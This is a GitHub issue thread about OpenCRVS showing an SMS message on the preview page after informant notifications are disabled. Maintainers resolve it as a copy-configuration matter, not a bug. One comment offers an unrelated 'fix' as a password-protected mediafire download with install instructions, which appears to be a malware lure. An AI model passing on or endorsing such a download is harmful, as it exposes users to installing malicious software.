### ISSUE TITLE
Remove message from preview page when "Notification sent to office" &  "Declare sent for review"  is disabled.

### ISSUE THREAD

**Issue by SyedaAfrida** [opencrvs/opencrvs-core#7534]
**Bug description**
Remove message from preview page when "Notification sent to office" &  "Declare sent for review"  is disabled.

**Steps to reproduce:**
1. Log in as National system admin
2. Navigate to Informant Notification >> Birth/Death
3. Disable ""Notification sent to office""
4. Log out. Again login as field agent.
5. Declare a complete/incomplete certificate
6. Go to preview page

**Actual result:**
A message says informant will receive an sms.

**Expected result:**
A generic message with ""Send for review"" button

**Note:** The copy on the configuration page for Informant Notifications is quite confusing as ""Notification"" has a meaning in civil registration that is completely different from providing status updates to the Informant via SMS/Email. The goal will be to improve the copy on this page."

**Screenshot/ Recording:**

![22](https://github.com/user-attachments/assets/18436c40-4ed8-46a0-9a06-e19b258ab83d)
![23](https://github.com/user-attachments/assets/9d3f7b15-4a77-41a8-9ca0-2a0ee6424416)

**Tested on:**
https://login.farajaland-qa.opencrvs.org/?lang=en

**Version:**
V1.6.0

**Comment by SyedaAfrida** [comment]
@jpye-finch @altaopencrvs We would require updated copy for the message. Please check the note in this ticket.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jpye-finch** [comment]
@SyedaAfrida 
Upon review this is not a bug. There is no expectation that the config setting automatically changes the copy. 

This should be a country configuration step to update the copy to suite their business process.

@altaopencrvs is proposing updated copy so that for Farajaland the copy is consistent for the different dates (ie. Declaration complete, incomplete, ready for review, ready to register)

cc. @altaopencrvs @prinzab

**Comment by SyedaAfrida** [comment]
Not a bug
